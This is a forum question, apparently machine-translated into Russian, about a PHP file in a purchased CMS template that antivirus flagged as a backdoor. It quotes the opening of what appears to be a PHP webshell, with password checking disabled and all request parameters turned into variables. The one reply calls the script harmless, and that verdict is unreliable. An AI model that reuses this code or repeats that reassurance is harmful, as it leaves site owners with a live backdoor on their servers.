2014-09-17 4 views
0

Я недавно купил шаблон для системы cms в Интернете и попросил разработчиков установить его для меня, это был не дешевый шаблон, так что я немного удивился, что когда я делал резервную копию своих файлов (через filezilla на мой компьютер), мой антивирус AVG вызвал обнаружение файла Trojan Horse PHP/BackDoor.AG как угрозу, и этот файл происходит из tmp/css.php в файлах, которые были загружены на мой сервер.троянский конь сценарий? на моем сервере

Сценарий выглядит следующим образом:

error_reporting(7); 
@set_magic_quotes_runtime(0);ob_start(); 
$mtime = explode(' ', microtime()); 
$starttime = $mtime[1] + $mtime[0]; 
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/'); 
//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0); 
define('IS_WIN', DIRECTORY_SEPARATOR == '\\'); 
define('IS_COM', class_exists('COM') ? 1 : 0); 
define('IS_GPC', get_magic_quotes_gpc()); $dis_func = get_cfg_var('disable_functions'); define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0); 
@set_time_limit(0); 

    foreach(array('_GET','_POST') as $_request) { 
foreach($$_request as $_key => $_value) { 
if ($_key{0} != '_') { 
if (IS_GPC) { 
$_value = s_array($_value); 
} $$_key = $_value; 
}}}/*===================== ³Ìà òÅäÖà =====================*/ 

    $admin = array(); 
// ÊÇ·ñà èÒªÃÜÂëÑéÖ¤, true �ªà èÒªÑéÖ¤, false �ªÖ±½Ó½øÈë.à ÂÃæÑ¡à îÔò��à § $admin['check'] = false; 
// Èç¹ûà èÒªÃÜÂëÑéÖ¤,Çëà �¸ÄµÇ½ÃÜÂë $admin['pass'] = 'hack'; 

Я понятия не имею, что это значит, есть больше кода, если тело хочет, чтобы посмотреть, я могу разместить ссылку на все это. Мне просто нужно знать, не нужно ли его удалять с моего веб-хоста.

Любая помощь с этим, я всегда навсегда! спасибо

ответ

-1

Код - это действительно уродливый сценарий «un-magic-quoter». комментарии выглядят так, как будто они были скопированы из-за плохой кодировки Unicode, возможно, более одного раза.

В противном случае сценарий кажется мне безвредным.

+0

Эй, спасибо, я не понимаю, почему это вызовет мой антивирус. – fairydragon